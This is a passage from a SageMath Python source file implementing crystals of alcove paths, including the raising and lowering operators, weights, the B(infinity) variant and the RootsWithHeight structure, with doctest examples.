[1, 2, 1, 0, 0, 0, 0, 1]\n \"\"\"\n highest_weight_crystal = self.parent()._highest_weight_crystal\n positions, gi = self._gi(i)\n\n m=max(gi)\n\n if not highest_weight_crystal and i == 0:\n raise NotImplementedError\n # I think the M below should still work in this case\n\n M = Integer(m)/2 - Integer(1)/2\n return M\n\n def epsilon(self, i):\n r\"\"\"\n Return the distance to the start of the `i`-string.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: [c.epsilon(1) for c in C]\n [0, 1, 0, 0, 1, 0, 1, 2]\n sage: [c.epsilon(2) for c in C]\n [0, 0, 1, 2, 1, 1, 0, 0]\n \"\"\"\n #crude but functional\n j = 0\n temp = self\n temp = temp.e(i)\n while temp is not None:\n j+=1\n temp = temp.e(i)\n\n return j\n\n def weight(self):\n \"\"\"\n Return the weight of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: for i in C: i.weight()\n (2, 0, 0)\n (1, 1, 0)\n (0, 2, 0)\n (0, -1, 0)\n (-1, 0, 0)\n (-2, -2, 0)\n sage: B = crystals.AlcovePaths(['A',2,1],[1,0,0])\n sage: p = B.module_generators[0].f_string([0,1,2])\n sage: p.weight()\n Lambda[0] - delta\n\n TESTS:\n\n Check that crystal morphisms work (:trac:`19481`)::\n\n sage: C1 = crystals.AlcovePaths(['A',2],[1,0])\n sage: C2 = crystals.AlcovePaths(['A',2],[2,0])\n sage: phi = C1.crystal_morphism(C2.module_generators, scaling_factors={1:2, 2:2})\n sage: [phi(x) for x in C1]\n [(), ((alpha[1], 0),), ((alpha[1], 0), (alpha[1] + alpha[2], 0))]\n\n Check that all weights are of level 0 in the KR crystal setting\n (:trac:`20292`)::\n\n sage: A = crystals.AlcovePaths(['A',2,1], [1,0], highest_weight_crystal=False)\n sage: all(x.weight().level() == 0 for x in A)\n True\n \"\"\"\n root_space = self.parent().R.root_space()\n weight = -self.parent().weight\n for i in self.value[::-1]:\n root = root_space(i.root)\n weight = -i.height*root + weight.reflection(root)\n\n WLR = self.parent().weight_lattice_realization()\n if self.cartan_type().is_affine() and self.parent()._highest_weight_crystal:\n # We assume that WLR is the (extended) weight lattice\n wt = WLR._from_dict({i: Integer(c) for i,c in -weight},\n remove_zeros=False)\n return wt\n La = WLR.fundamental_weights()\n wt = WLR.sum(Integer(c) * La[i] for i,c in -weight)\n if self.cartan_type().is_affine():\n assert not self.parent()._highest_weight_crystal\n wt -= La[0] * wt.level()\n return wt\n\n #def __repr__(self):\n #return str(self.integer_sequence())\n\n def plot(self):\n r\"\"\"\n Return a plot ``self``.\n\n .. NOTE::\n\n Currently only implemented for types `A_2`, `B_2`, and `C_2`.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C( () ).f(1).f(2)\n sage: x.plot() # Not tested - creates a pdf\n \"\"\"\n ct = self.parent()._R._cartan_type.dual()\n word = self.parent()._R.word()\n integer_sequence = self.integer_sequence()\n foldings = [False for i in word]\n for i in integer_sequence:\n foldings[i] = True\n affine_ambient_space = RootSystem(ct.affine()).ambient_space()\n return affine_ambient_space.plot() + affine_ambient_space.plot_alcove_walk( word, foldings=foldings, labels=False)\n\n def _richcmp_(self, other, op):\n r\"\"\"\n Comparison of ``self.value`` and ``other.value``.\n\n For inequalities, ``self.value`` is compared to\n ``other.value`` in dictionary order.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B',2],[1,0])\n sage: lst = list(C)\n sage: lst[2] == lst[2]\n True\n sage: lst[2] == lst[1]\n False\n sage: lst[2] != lst[2]\n False\n sage: lst[2] != lst[1]\n True\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C(())\n sage: x < x.f(1)\n True\n sage: a = x.f(1) ; b = x.f(1).f(1).f(2)\n sage: a < b\n False\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C( () )\n sage: x > x.f(1)\n False\n sage: a = x.f(1) ; b = x.f(1).f(1).f(2)\n sage: a > b\n True\n \"\"\"\n return richcmp(self.value, other.value, op)\n\n def __hash__(self):\n \"\"\"\n Return the hash of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B',2],[1,0])\n sage: lst = list(C)\n sage: hash(lst[2]) == hash(lst[2])\n True\n \"\"\"\n return hash(self.value)\n\n def _folding_data(self, i):\n r\"\"\"\n Compute information needed to build the graph `g_{\\alpha_i}`.\n Results of this method are sent to _gi for further processing.\n\n INPUT:\n\n - ``i`` -- element of the index_set of the underlying root_system.\n\n OUTPUT:\n\n A dictionary where the keys are of type RootsWithHeight which record\n positions where `\\pm \\alpha_i` shows up in the folded `\\lambda` chain.\n The values are `1` if `\\alpha_i` is in the corresponding position in\n the folded `\\lambda`-chain, `-1` if `-\\alpha_i` is in the corresponding\n position in the folded `\\lambda`-chain.\n\n .. NOTE::\n\n *infinity* is a special key that records the \"sign at infinity\".\n\n ::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: x = C( () ).f(1)\n sage: fd = x._folding_data(2); fd # # random output\n {(alpha[2], 0): 1, (alpha[1] + alpha[2], 1): 1, 'infinity': 1}\n sage: fd['infinity']\n 1\n sage: sorted(fd.values())\n [1, 1, 1]\n \"\"\"\n Parent = self.parent()\n\n # self.value contains the admissible sequence as a tuple of Element\n\n finite_cartan_type = Parent._finite_cartan_type # bool\n J = list(self.value)\n\n # NOTE: R is a RootsWithHeight object and NOT a RootSystem object\n R = Parent._R\n weight = Parent.weight\n\n signs = {}\n\n # 0 arrows in the case of finite Cartan type\n # always allow 0 arrows\n if finite_cartan_type and i == 0:\n Beta = R._root_lattice.highest_root()\n elif i in self.index_set():\n Beta = R._root_lattice.simple_root(i)\n\n max_height_Beta = weight.scalar(Beta.associated_coroot())\n\n if not J:\n for k in range(max_height_Beta):\n x = R(Beta, k)\n signs[x] = self._sign(Beta)\n signs['infinity'] = self._sign(Beta)\n\n else:\n # NOTE: we assume J is sorted by order on Element of RootsWithHeight\n\n for k in range(max_height_Beta):\n x = R(Beta, k)\n if x <= J[0]:\n signs[x] = self._sign(Beta)\n\n for j in range(len(J)):\n Beta = Beta.reflection(J[j].root)\n sign_Beta = self._sign(Beta)\n max_height_Beta = weight.scalar(\n (sign_Beta * Beta).associated_coroot())\n\n # some optimization so we don't initialize too many objects\n # range(c1,c2) can be replaced by range(max_height_Beta) but it\n # checks unnecessary extra things\n\n c1 = J[j]._cmp_v[0] * max_height_Beta\n if j == len(J) - 1:\n c2 = max_height_Beta\n else:\n c2 = min(max_height_Beta, J[j+1]._cmp_v[0]*max_height_Beta + 1)\n\n for k in range(int(c1), int(c2)):\n\n x = R( sign_Beta * Beta , k)\n\n if (\n ( j < len(J) - 1 and J[j] < x <= J[j+1] ) or\n ( j == len(J) - 1 and J[j] < x)\n ):\n signs[x] = sign_Beta\n\n signs['infinity'] = sign_Beta\n # tail sign tells something about last step in g_alpha\n\n if finite_cartan_type and i == 0:\n signs = {x: -signs[x] for x in signs}\n\n return signs\n\n def e(self, i):\n r\"\"\"\n Return the `i`-th crystal raising operator on ``self``.\n\n INPUT:\n\n - ``i`` -- element of the index set of the underlying root system.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0]); C\n Highest weight crystal of alcove paths of type ['A', 2] and weight 2*Lambda[1]\n sage: x = C( () )\n sage: x.e(1)\n sage: x.f(1) == x.f(1).f(2).e(2)\n True\n \"\"\"\n Parent = self.parent()\n finite_cartan_type = Parent._finite_cartan_type\n\n J = list(self.value)\n positions, gi = self._gi(i)\n\n m = max(gi)\n m_index = len(gi)-1-list(reversed(gi)).index(m) # last max in gi\n\n if finite_cartan_type and i == 0:\n M = Integer(m)/2 + Integer(1)/2\n else:\n M = Integer(m)/2 - Integer(1)/2\n\n KR_test = finite_cartan_type and i==0 and m_index < len(gi) - 1\n KR_test = KR_test and M >= 1\n\n ######################################################################\n # NOTE:\n # In the KR_case we want to insure that positions[m_index] is in J\n # If m_index > 0 then it's always true\n # If m_index == 0 then M >=1 guarantees this\n ######################################################################\n\n if ( (not finite_cartan_type or i!=0) and m_index < len(gi)-1 # alpha_i is a simple root\n ) or KR_test:\n\n J.remove(positions[m_index])\n if m_index+1 < len(positions): # if m_index+1 != 'infinity'\n # i.e. positions[m_index+1] makes sense\n J.append(positions[m_index + 1])\n return_value = Parent(tuple(sorted(J)))\n\n # we attach to each admissible sequence a list\n # which encodes a path (via root operators) from the () generator\n # to the admissible sequence\n # this is useful for investing the crystal\n\n try:\n return_value.i_string = self.i_string + [['e', i]]\n except AttributeError:\n return_value.i_string = [['e', i]]\n\n return return_value\n else:\n return None\n\n @cached_method\n def _gi(self, i):\n r\"\"\"\n Compute information needed to build the graph `g_{\\alpha_i}`.\n This graph is used to apply the `i`-th crystal operator.\n\n INPUT:\n\n - ``i`` - element of the index_set of the underlying root_system.\n\n OUTPUT:\n\n A tuple ``(positions, gi)``:\n\n - ``positions`` -- is a list of RootsWithHeight. These appear sorted in\n their natural order, and record where `\\pm \\alpha_i` shows up in\n the folded `\\lambda`-chain.\n\n - ``gi`` -- is a list of integers recording the height\n (up to affine transformation) of `\\pm \\alpha_i`\n in the folded `\\lambda`-chain whose location is recorded by\n ``positions``.\n\n .. NOTE::\n\n - ``positions`` has length one less than ``gi`` since it does not\n contain the position 'infinity'.\n\n - To get the real `g_{\\alpha_i}` one has to divide by 2 and add 1/2\n or divide by 2 and subtract 1/2 depending on if\n ``self._finite_cartan_type==True and i == 0``\n or not. This is done in crystal operator methods.\n\n EXAMPLES::\n\n sage: C=crystals.AlcovePaths(['A',2],[1,1])\n sage: x=C( () ).f(1)\n sage: x._gi(2)\n ([(alpha[2], 0), (alpha[1] + alpha[2], 1)], [1, 3, 5])\n \"\"\"\n signs = self._folding_data(i)\n positions = sorted(x for x in signs if x != 'infinity')\n\n if not positions:\n return (positions, [signs['infinity']])\n\n gi = [ signs[ positions[0] ] ]\n for j in range(1,len(positions)):\n gi.append(\n gi[j-1] +\n signs[positions[j-1]]*self._eps(positions[j-1]) + signs[positions[j]] )\n gi.append( gi[-1] +\n signs[positions[-1]]*self._eps(positions[-1]) + signs['infinity'] )\n\n return (positions, gi)\n\n def f(self, i):\n r\"\"\"\n Returns the `i`-th crystal lowering operator on ``self``.\n\n INPUT:\n\n - ``i`` -- element of the index_set of the underlying root_system.\n\n EXAMPLES::\n\n sage: C=crystals.AlcovePaths(['B',2],[1,1])\n sage: x=C( () )\n sage: x.f(1)\n ((alpha[1], 0),)\n sage: x.f(1).f(2)\n ((alpha[1], 0), (alpha[1] + alpha[2], 2))\n\n \"\"\"\n Parent = self.parent()\n finite_cartan_type = Parent._finite_cartan_type\n\n # get a copy in a form of a list of self.value\n J = list(self.value)\n positions, gi = self._gi(i)\n\n m = max(gi)\n m_index=gi.index(m)\n\n if finite_cartan_type and i == 0:\n\n # python doesn't handle fractions natively\n M = Integer(m)/2 + Integer(1)/2\n else:\n M = Integer(m)/2 - Integer(1)/2\n\n # boolean determining when to move a folding in KR case\n KR_test = finite_cartan_type and i == 0\n KR_test = KR_test and M > 1\n\n # In the KR case, we return a value other than None when\n # `\\alpha_i` is in position m_index - 1\n # (The following relies on a technical condition (C2) )\n # note insert reference\n #\n # if m_index - 1 == 0 then M > 1 and (C2) forces\n # `\\alhpa_i` in positions[m_index - 1]\n #\n # otherwise if m_index - 1 > 0 then (C2) is enough\n\n if ( (not finite_cartan_type or i!=0) and M > 0 # alpha_i is a simple root\n ) or KR_test :# KR case\n\n J.append(positions[m_index-1])\n if m_index < len(positions): # if m_index != 'infinity'\n # thus positions[m_index] makes sense\n J.remove(positions[m_index])\n return_value = Parent(tuple(sorted(J)))\n\n # we attach to each admissible sequence a list\n # which encodes a path (via root operators) from the generator ()\n\n try:\n return_value.i_string = self.i_string + [['f', i]]\n except AttributeError:\n return_value.i_string = [['f', i]]\n\n return return_value\n else:\n return None\n\n @staticmethod\n def _sign(root):\n r\"\"\"\n Return `1` if root is a positive root, and `-1` if root is a negative\n root.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import CrystalOfAlcovePathsElement\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([0,1]))\n sage: CrystalOfAlcovePathsElement._sign(x)\n 1\n \"\"\"\n if root.is_positive_root():\n return 1\n else:\n return -1\n\n def _eps(self, root):\n r\"\"\"\n Return `-1` if root is in ``self.value``, otherwise return `1`.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['C',2],[3,2])\n sage: x = C( () ).f(1).f(2); x\n ((alpha[1], 2), (2*alpha[1] + alpha[2], 4))\n sage: x._eps(x.value[0])\n -1\n sage: R = C._R\n sage: y = R ( x.value[0].root, 1 ); y\n (alpha[1], 1)\n sage: x._eps(y)\n 1\n\n \"\"\"\n if root in self.value:\n return -1\n else:\n return 1\n\n def path(self):\n \"\"\"\n Return the path in the (quantum) Bruhat graph corresponding\n to ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B', 3], [3,1,2])\n sage: b = C.highest_weight_vector().f_string([1,3,2,1,3,1])\n sage: b.path()\n [1, s1, s3*s1, s2*s3*s1, s3*s2*s3*s1]\n sage: b = C.highest_weight_vector().f_string([2,3,3,2])\n sage: b.path()\n [1, s2, s3*s2, s2*s3*s2]\n sage: b = C.highest_weight_vector().f_string([2,3,3,2,1])\n sage: b.path()\n [1, s2, s3*s2, s2*s3*s2, s1*s2*s3*s2]\n \"\"\"\n W = WeylGroup(self.parent()._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n\n #start at the identity\n w = W.one()\n ret = [w]\n for i in self:\n ret.append(ret[-1] * prod(s[j] for j in i.root.associated_reflection()))\n return ret\n\n\nCrystalOfAlcovePaths.Element = CrystalOfAlcovePathsElement\n\n\nclass InfinityCrystalOfAlcovePaths(UniqueRepresentation, Parent):\n r\"\"\"\n `\\mathcal{B}(\\infty)` crystal of alcove paths.\n \"\"\"\n @staticmethod\n def __classcall_private__(cls, cartan_type):\n \"\"\"\n Normalize input to ensure a unique representation.\n\n TESTS::\n\n sage: A1 = crystals.infinity.AlcovePaths(['A',2])\n sage: A2 = crystals.infinity.AlcovePaths(CartanType(['A',2]))\n sage: A3 = crystals.infinity.AlcovePaths('A2')\n sage: A1 is A2 and A2 is A3\n True\n \"\"\"\n cartan_type = CartanType(cartan_type)\n return super().__classcall__(cls, cartan_type)\n\n def __init__(self, cartan_type):\n \"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: A = crystals.infinity.AlcovePaths(['C',3])\n sage: TestSuite(A).run(max_runs=20)\n\n sage: A = crystals.infinity.AlcovePaths(['A',2,1])\n sage: TestSuite(A).run() # long time\n \"\"\"\n self._cartan_type = cartan_type\n Parent.__init__(self, category=HighestWeightCrystals().Infinite())\n\n self.module_generators = ( self.element_class(self, (), 0), )\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: crystals.infinity.AlcovePaths(['E',6])\n Infinity crystal of alcove paths of type ['E', 6]\n \"\"\"\n return \"Infinity crystal of alcove paths of type {}\".format(self._cartan_type)\n\n class Element(ElementWrapper):\n def __init__(self, parent, elt, shift):\n \"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['F',4])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([2,3,1,4,4,2,3,1])\n sage: TestSuite(x).run()\n \"\"\"\n ElementWrapper.__init__(self, parent, elt)\n self._shift = shift\n\n def e(self, i):\n \"\"\"\n Return the action of `e_i` on ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['D',5,1])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,3,4,2,5,4,5,5])\n sage: x.f(4).e(5) == x.e(5).f(4)\n True\n \"\"\"\n y = self.projection().e(i)\n if y is None:\n return None\n if not y.value:\n return self.parent().module_generators[0]\n\n n = self.parent()._cartan_type.rank()\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n shift = self._shift\n while y.is_admissible():\n # The only element with a shift of 0 is the highest weight element.\n # So we do not need to check for the shift being 0.\n prev = y\n shift -= 1\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [shift]*n)\n try:\n y = A(tuple([A._R(rt.root, rt.height - s(rt.root)) for rt in y.value]))\n except ValueError: # Invalid height (and not admissible)\n break\n shift += 1\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - shift*s(rt.root))\n for rt in prev.value]),\n shift)\n\n def f(self, i):\n \"\"\"\n Return the action of `f_i` on ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['E',7,1])\n sage: mg = A.highest_weight_vector()\n sage: mg.f_string([1,3,5,6,4,2,0,2,1,0,2,4,7,4,2])\n ((alpha[2], -3), (alpha[5], -1), (alpha[1], -1),\n (alpha[0] + alpha[1], -2),\n (alpha[2] + alpha[4] + alpha[5], -2),\n (alpha[5] + alpha[6], -1), (alpha[1] + alpha[3], -1),\n (alpha[5] + alpha[6] + alpha[7], -1),\n (alpha[0] + alpha[1] + alpha[3], -1),\n (alpha[1] + alpha[3] + alpha[4] + alpha[5], -1))\n \"\"\"\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n y = self.projection().f(i)\n if y is not None:\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - self._shift*s(rt.root))\n for rt in y.value]),\n self._shift)\n\n shift = self._shift + 1\n n = self.parent()._cartan_type.rank()\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [shift]*n)\n y = A(tuple([A._R(rt, h + shift*s(rt)) for rt,h in self.value])).f(i)\n return type(self)(self.parent(),\n tuple([(rt.root, rt.height - shift*s(rt.root))\n for rt in y.value]),\n shift)\n\n def epsilon(self, i):\n r\"\"\"\n Return `\\varepsilon_i` of ``self``.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['A',7,2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,0,2,3,4,4,4,2,3,3,3])\n sage: [x.epsilon(i) for i in A.index_set()]\n [0, 0, 0, 3, 0]\n sage: x = mg.f_string([2,2,1,1,0,1,0,2,3,3,3,4])\n sage: [x.epsilon(i) for i in A.index_set()]\n [1, 2, 0, 1, 1]\n \"\"\"\n return self.projection().epsilon(i)\n\n def phi(self, i):\n r\"\"\"\n Return `\\varphi_i` of ``self``.\n\n Let `A \\in \\mathcal{B}(\\infty)` Define `\\varphi_i(A) :=\n \\varepsilon_i(A) + \\langle h_i, \\mathrm{wt}(A) \\rangle`,\n where `h_i` is the `i`-th simple coroot and `\\mathrm{wt}(A)`\n is the :meth:`weight` of `A`.\n\n INPUT:\n\n - ``i`` -- an element of the index set\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['A',8,2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([1,0,2,3,4,4,4,2,3,3,3])\n sage: [x.phi(i) for i in A.index_set()]\n [1, 1, 1, 3, -2]\n sage: x = mg.f_string([2,2,1,1,0,1,0,2,3,3,3,4])\n sage: [x.phi(i) for i in A.index_set()]\n [4, -1, 0, 0, 2]\n \"\"\"\n P = self.parent().weight_lattice_realization()\n h = P.simple_coroots()\n return self.epsilon(i) + P(self.weight()).scalar(h[i])\n\n def weight(self):\n \"\"\"\n Return the weight of ``self``.\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['E',6])\n sage: mg = A.highest_weight_vector()\n sage: fstr = [1,3,4,2,1,2,3,6,5,3,2,6,2]\n sage: x = mg.f_string(fstr)\n sage: al = A.weight_lattice_realization().simple_roots()\n sage: x.weight() == -sum(al[i]*fstr.count(i) for i in A.index_set())\n True\n \"\"\"\n P = self.parent().weight_lattice_realization()\n y = self.projection()\n return y.weight() - self._shift * P.rho()\n\n def projection(self, k=None):\n r\"\"\"\n Return the projection ``self`` onto `B(k \\rho)`.\n\n INPUT:\n\n - ``k`` -- (optional) if not given, defaults to the smallest\n value such that ``self`` is not ``None`` under the projection\n\n EXAMPLES::\n\n sage: A = crystals.infinity.AlcovePaths(['G',2])\n sage: mg = A.highest_weight_vector()\n sage: x = mg.f_string([2,1,1,2,2,2,1,1]); x\n ((alpha[2], -3), (alpha[1] + alpha[2], -3),\n (3*alpha[1] + 2*alpha[2], -1), (2*alpha[1] + alpha[2], -1))\n sage: x.projection()\n ((alpha[2], 0), (alpha[1] + alpha[2], 9),\n (3*alpha[1] + 2*alpha[2], 8), (2*alpha[1] + alpha[2], 14))\n sage: x.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 3*Lambda[1] + 3*Lambda[2]\n\n sage: mg.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 0\n sage: mg.f(1).projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight Lambda[1] + Lambda[2]\n sage: mg.f(1).f(2).projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight Lambda[1] + Lambda[2]\n sage: b = mg.f_string([1,2,2,1,2])\n sage: b.projection().parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 2*Lambda[1] + 2*Lambda[2]\n sage: b.projection(3).parent()\n Highest weight crystal of alcove paths of type ['G', 2]\n and weight 3*Lambda[1] + 3*Lambda[2]\n sage: b.projection(1)\n \"\"\"\n if k is None:\n k = self._shift\n elif k < self._shift:\n return None\n s = lambda rt: int(sum(rt.associated_coroot().coefficients()))\n n = self.parent()._cartan_type.rank()\n A = CrystalOfAlcovePaths(self.parent()._cartan_type, [k]*n)\n return A(tuple([A._R(rt, h + k*s(rt)) for rt,h in self.value]))\n\n\nclass RootsWithHeight(UniqueRepresentation, Parent):\n r\"\"\"\n Data structure of the ordered pairs `(\\beta,k)`,\n where `\\beta` is a positive root and `k` is a non-negative integer. A total\n order is implemented on this set, and depends on the weight.\n\n INPUT:\n\n - ``cartan_type`` -- Cartan type of a finite or affine untwisted root\n system\n\n - ``weight`` -- dominant weight as a list of (integral) coefficients of\n the fundamental weights\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n\n sage: r1 = R._root_lattice.from_vector(vector([1,0])); r1\n alpha[1]\n sage: r2 = R._root_lattice.from_vector(vector([1,1])); r2\n alpha[1] + alpha[2]\n\n sage: x = R(r1,0); x\n (alpha[1], 0)\n sage: y = R(r2,1); y\n (alpha[1] + alpha[2], 1)\n sage: x < y\n True\n \"\"\"\n\n @staticmethod\n def __classcall_private__(cls, starting_weight, cartan_type = None):\n \"\"\"\n Classcall to mend the input.\n\n Internally, the RootsWithHeight code works with a ``starting_weight`` that\n is in the ``weight_space`` associated to the crystal. The user can, however,\n also input a ``cartan_type`` and the coefficients of the fundamental weights\n as ``starting_weight``. This code transforms the input into the right\n format (also necessary for UniqueRepresentation).\n\n TESTS::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: S = RootsWithHeight(CartanType(['A',2]), (3,2))\n sage: R is S\n True\n\n sage: R = RootSystem(['B',2,1])\n sage: La = R.weight_space().basis()\n sage: C = RootsWithHeight(['B',2,1],[0,0,1])\n sage: B = RootsWithHeight(La[2])\n sage: B is C\n True\n \"\"\"\n if cartan_type is not None:\n cartan_type, starting_weight = CartanType(starting_weight), cartan_type\n\n R = RootSystem(cartan_type)\n P = R.weight_space()\n Lambda = P.basis()\n offset = R.index_set()[Integer(0)]\n starting_weight = P.sum(starting_weight[j-offset]*Lambda[j] for j in R.index_set())\n\n return super().__classcall__(cls, starting_weight)\n\n def __init__(self, weight):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: TestSuite(R).run()\n \"\"\"\n Parent.__init__(self, category = Sets() )\n\n cartan_type = weight.parent().cartan_type()\n self._cartan_type = cartan_type\n self._root_system = RootSystem(cartan_type)\n self._root_lattice = self._root_system.root_lattice()\n self._weight_lattice = self._root_system.weight_lattice()\n self.weight = weight\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: RootsWithHeight(['A',2],[3,2])\n Roots with height of Cartan type ['A', 2] and dominant weight 3*Lambda[1] + 2*Lambda[2]\n \"\"\"\n return \"Roots with height of Cartan type %s and dominant weight %s\" % (\n self._root_system.cartan_type(), self.weight)\n\n def _max_height(self, root):\n r\"\"\"\n If root is `\\beta`, return `k = \\langle \\lambda, \\beta^{\\vee} \\rangle`.\n\n Only ordered pairs of the form `(\\beta, l)` for `0 \\leq l < k` are\n allowed.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: C = RootsWithHeight(['A',3],[3,2,0])\n sage: x = C._root_lattice.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: C._max_height(x)\n 5\n \"\"\"\n return self.weight.scalar(root.associated_coroot())\n\n @cached_method\n def word(self):\n r\"\"\"\n Gives the initial alcove path (`\\lambda`-chain) in terms of simple\n roots. Used for plotting the path.\n\n .. NOTE::\n\n Currently only implemented for finite Cartan types.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: R.word()\n [2, 1, 2, 0, 1, 2, 1, 0, 1, 2]\n \"\"\"\n cartan_type = self._root_system.cartan_type()\n if not cartan_type.is_finite():\n raise NotImplementedError\n lambda_chain = [ x.root for x in self.lambda_chain() ]\n\n coroot_lattice = RootSystem(cartan_type).coroot_lattice()\n cohighest_root = coroot_lattice.highest_root()\n\n word = []\n for i in range(len(lambda_chain)):\n beta = lambda_chain[i]\n for j in reversed(range(i)):\n beta = beta.reflection(lambda_chain[j])\n #beta is now a simple root or the highest root\n\n coroot = beta.associated_coroot()\n support = coroot.support() # the path is in dual affine space\n if len(support) == 1: # beta is a simple root\n word.append(support[0])\n elif coroot == -cohighest_root:\n word.append(0)\n else:\n assert False, 'should never get here'\n\n return word\n\n @cached_method\n def lambda_chain(self):\n r\"\"\"\n Return the unfolded `\\lambda`-chain.\n\n .. NOTE:: Only works in root systems of finite type.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: R.lambda_chain()\n [(alpha[2], 0), (alpha[1] + alpha[2], 0), (alpha[1], 0), (alpha[1] + alpha[2], 1)]\n \"\"\"\n if not self._root_lattice.cartan_type().is_finite():\n raise ValueError(\"Cartan type {0} is not finite\".format(self._root_lattice.cartan_type()))\n\n l=[]\n for i in self._root_lattice.positive_roots():\n for j in range(self._max_height(i)):\n l.append(self(i,j))\n\n return sorted(l)\n\n def _element_constructor_(self, root, height):\n r\"\"\"\n Construct a :class:`RootsWithHeightElement` with ``self`` as the parent.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: y = R(x,1); y\n (alpha[1] + alpha[2], 1)\n \"\"\"\n root = self._root_lattice.from_vector(vector(root))\n return self.element_class(self, root, height)\n\n def _an_element_(self):\n r\"\"\"\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: R._an_element_()\n (alpha[1], 0)\n \"\"\"\n return self( self._root_lattice.from_vector(vector([1])), 0 )\n\n\nclass RootsWithHeightElement(Element):\n r\"\"\"\n Element of :class:`RootsWithHeight`.\n\n INPUT:\n\n - ``root`` -- A positive root `\\beta` in our root system\n - ``height`` -- Is an integer, such that\n `0 \\leq l \\leq \\langle \\lambda, \\beta^{\\vee} \\rangle`\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1])); x\n alpha[1] + alpha[2]\n sage: R = RootsWithHeight(['A',2],[1,1]); R\n Roots with height of Cartan type ['A', 2] and dominant weight Lambda[1] + Lambda[2]\n sage: y = R(x, 1); y\n (alpha[1] + alpha[2], 1)\n \"\"\"\n\n def __init__(self, parent, root, height):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import RootsWithHeight\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([1,1]))\n sage: R = RootsWithHeight(['A',2],[3,2])\n sage: y = R(x, 1); y\n (alpha[1] + alpha[2], 1)\n sage: TestSuite(x).run()\n \"\"\"\n Element.__init__(self, parent)\n max_height = parent._max_height(root)\n\n # make sure the height is in the right range, this also catches negative\n # roots\n\n if not 0 <= height < max_height:\n raise ValueError(\"%d out of allowed range [%d,%d)\"%(height, 0, max_height))\n\n v = [height/max_height]\n 